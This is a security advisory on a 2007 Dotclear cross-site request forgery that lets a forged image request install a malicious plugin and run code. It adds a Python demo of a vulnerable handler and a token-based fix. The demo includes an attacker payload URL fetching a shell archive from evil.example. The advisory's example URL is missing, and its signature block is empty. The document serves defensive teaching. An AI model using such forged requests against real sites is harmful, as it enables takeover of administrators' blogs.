-----BEGIN PGP SIGNED MESSAGE-----
A French website describes two vulnerabilities: one affecting WordPress
(27/05/2007) and the other affecting Dotclear (08/07/2007):
If a Dotclear blog administrator is logged in (or holds a cookie for
automatic login), an attacker can make the administrator's browser request
a crafted URL without his knowledge, for example through an image tag
posted in the blog's comments or forum, since the browser attaches the
session cookie to that request. The URL looks like:
Dotclear will then fetch, install and activate the plugin
Because a plugin is PHP code run by the web server, this is enough to
execute arbitrary commands on the remote host.
A temporary workaround is to rename the administration folder ("ecrire"
for Dotclear 1, "admin" for Dotclear 2), which breaks the attacker's
hard-coded URL; this only hides the target and does not fix the missing
request check. There is no official patch at this time.
Other requests built on the same principle allow an attacker to add an
administrator account or change the site's theme.
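The attack described above is a cross-site request forgery: a state-changing
action is reachable by a plain GET and authenticated by nothing but the
session cookie, which the browser sends automatically. The following is an
added example, not Dotclear's code, showing a toy version of such a handler
beside the usual fix (a per-session token that a third-party page cannot
read, checked on a POST). The hostnames, the plugin endpoint and the
parameter names are hypothetical.

```python
"""Added example (not Dotclear's code): CSRF against a cookie-authenticated
admin action, and the synchronizer-token fix. All names are hypothetical."""
import secrets
from urllib.parse import urlsplit, parse_qs

# --- toy server state: sessions keyed by cookie value -------------------------
sessions = {}           # cookie -> {"user": ..., "csrf": per-session token}
installed_plugins = []  # the server state an attacker wants to change


def login(user):
    """Create a session and return the cookie the browser will store."""
    cookie = secrets.token_hex(16)
    sessions[cookie] = {"user": user, "csrf": secrets.token_hex(16)}
    return cookie


def vulnerable_install(cookie, url):
    """State change on a GET, authenticated only by the session cookie.
    Any page the admin visits can trigger it via <img src=...>."""
    sess = sessions.get(cookie)
    if not sess or sess["user"] != "admin":
        return "forbidden"
    plugin = parse_qs(urlsplit(url).query)["plugin"][0]
    installed_plugins.append(plugin)
    return "installed"


def hardened_install(cookie, method, url, form):
    """Require a POST carrying the session's CSRF token in the form body.
    An attacker's page can make the browser send the cookie, but it cannot
    read the token that was rendered into the admin's own form."""
    sess = sessions.get(cookie)
    if not sess or sess["user"] != "admin":
        return "forbidden"
    if method != "POST":
        return "method not allowed"
    if not secrets.compare_digest(form.get("csrf", ""), sess["csrf"]):
        return "csrf token mismatch"
    installed_plugins.append(form["plugin"])
    return "installed"


# Constructed attacker payload: an <img> on the attacker's page pointing at the
# admin endpoint (hypothetical path) with an attacker-controlled plugin source.
EVIL_IMG = "http://blog.example/admin/plugins.php?plugin=http://evil.example/shell.zip"
ADMIN_URL = "http://blog.example/admin/plugins.php"


def forged_get_vulnerable():
    """The browser loads EVIL_IMG with the admin's cookie: the plugin is installed."""
    installed_plugins.clear()
    cookie = login("admin")
    return vulnerable_install(cookie, EVIL_IMG), list(installed_plugins)


def forged_get_hardened():
    """Same <img> against the hardened handler: an image tag can only GET."""
    installed_plugins.clear()
    cookie = login("admin")
    return hardened_install(cookie, "GET", EVIL_IMG, {}), list(installed_plugins)


def forged_post_hardened():
    """An auto-submitting cross-site form can POST, but must guess the token."""
    installed_plugins.clear()
    cookie = login("admin")
    form = {"plugin": "http://evil.example/shell.zip", "csrf": "guess"}
    return hardened_install(cookie, "POST", ADMIN_URL, form), list(installed_plugins)


def legitimate_post_hardened():
    """The admin's own form carries the token the server rendered for him."""
    installed_plugins.clear()
    cookie = login("admin")
    form = {"plugin": "gallery", "csrf": sessions[cookie]["csrf"]}
    return hardened_install(cookie, "POST", ADMIN_URL, form), list(installed_plugins)


if __name__ == "__main__":
    print("vulnerable, forged GET :", forged_get_vulnerable())
    print("hardened, forged GET   :", forged_get_hardened())
    print("hardened, forged POST  :", forged_post_hardened())
    print("hardened, real POST    :", legitimate_post_hardened())
```

Renaming the admin folder only changes the URL the attacker has to guess;
the token check is what actually ties the request to a page the
administrator himself loaded. Marking the session cookie SameSite is a
further, browser-side layer, but it did not exist in 2007 and is not a
substitute for the server-side check.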
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
-----END PGP SIGNATURE-----